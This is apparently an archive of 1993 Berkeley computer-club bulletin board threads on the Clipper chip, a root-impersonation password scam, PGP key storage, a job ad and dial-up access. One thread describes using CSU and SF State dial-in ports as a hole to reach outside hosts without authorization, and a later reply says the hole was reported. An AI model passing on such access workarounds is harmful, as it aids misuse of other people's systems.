is clouded and ignored by bandying about terms like
"big brother" and "facist." It's ludicrous to think that
the government will monitor *more* communications if
Clipper passes.
\_ It's not ludicrous at all. Monitoring resources are
costly. If Clipper is easier -- cheaper -- to monitor
than alternative technologies, than the government
can listen in more than they would otherwise. Even
totalitarians are subject to economics...
\_ Encryption now: none.
Ease of tapping: easy.
Encryption with Clipper: some.
Ease of tapping: Less.
This isn't brain surgery. The government isn't asking
for anything it doesn't already have. Deal with the
real issues instead of fear-mongering.
\_ In addition, clipper will fool people into thinking
they're safe when they aren't...so communications
that were thought too important to trust to the net
before will become open to the government.
\_ Not without a search warrant.
\_ No, Clipper will fool *stupid* people into
thinking they're safe. There's a difference.
\_ It could be argues that Clipper provides increased privacy
since it gives cell phone makers, etc. free encryption
with no r&d costs. I'd prefer knowing the line was secure
from everyone buty the cops than open to anyone who knows
what frequency to listen in on...
\_ You're assuming that this wonderful algorithm that the
NSA came up with is a good one. Since it's so secret,
it could be total bullshit for all anyone knows...although
far be it for me to imply that the government is somehow
able to make mistakes...
\_ With the incredibly quick advances
in technology, nothing is secure for more than
a decade or two. |
| 1993/12/10 [Computer/SW/Security, Computer/SW/Unix] UID:31434 Activity:nil |
12/8 Apparently some idiot is going around calling soda users, telling
them he's root@soda and that he needs their current password.
root@soda would never do this, and if you're stupid enough to be
duped by this guy, your account will be shut off. |
| 1993/10/11 [Computer/SW/Security] UID:31413 Activity:nil |
10/10 Is leaving pgp on soda a good idea? the physical control of the
private key is lost when you leave it on soda... -curious hoding
\_ You can leave your public keyring here and use PGP via various
add-ins for EMACS, Elm, and mail. Then you can download any
messages and decode them at home. That's only if you're paranoid
though. You can just as easily just take permissions off the
file and it will pretty safe for casual use. |
| 1993/5/26-28 [Computer/SW/Security, Industry/Jobs] UID:31330 Activity:nil |
5/19 Berkeley Systems, Inc (makers of the AfterDark screen saver) is looking
for a full-time assistant in their Access products group -- products
to make computers accessable by vision-impaired users. Complete
details in ~dwallach/bsi.job |
| 1993/5/26 [Computer/SW/Unix, Computer/SW/Security, Computer/Networking] UID:31325 Activity:nil |
5/24 Anybody know of an annex port in the Los Angeles area (818 area)
that would allow me to connect to Berkeley computers? kmanoj
\_ dunno, but netcom has a Point Of Presence in LA area somewheres,
if it's local to you it'll only be 17.50/mo, and you can use it
in the bay area also....
\_ How about numbers for UCLA, USC, or CSUN annex ports? Anybody
have those?
forget it bud. even if you have those numbers, the annex
port is like berkeley's, won't let you connect outside its system
\_ I've heard that the annex port at CalTech allows you to telnet
out, but you need the IP address for whatever machine.
Sorry, don't know the phone number. -jesse
\_ Okay, here's the story boys and girls. Connect up to a CSU
server that's local to you. There's one in Northridge at
(818) 701-0478; one in Los Alamos at (310) 985-9540. From
there, open a connection to SF State with "sf/40" (port 40).
Then do a "connect <your-favorite-MUD>" command, and you're
there! Connection's kinda slow; but hey, it's semi-free!
(Dunno about legality, so use at your own risk!) I also
have those CalTech numbers, so mail me if you want 'em
-jctwu
\_ I've warned them of this security hole and it will shortly
be turned off. |
| 1993/4/18 [Computer/SW/Security, Computer/SW/Unix] UID:31274 Activity:nil |
4/17 /usr/local/csua is a goddamn mess, as is the life file.
Some root hoser should clean it up instead of looking for
``criminals''... |
| 11/23 |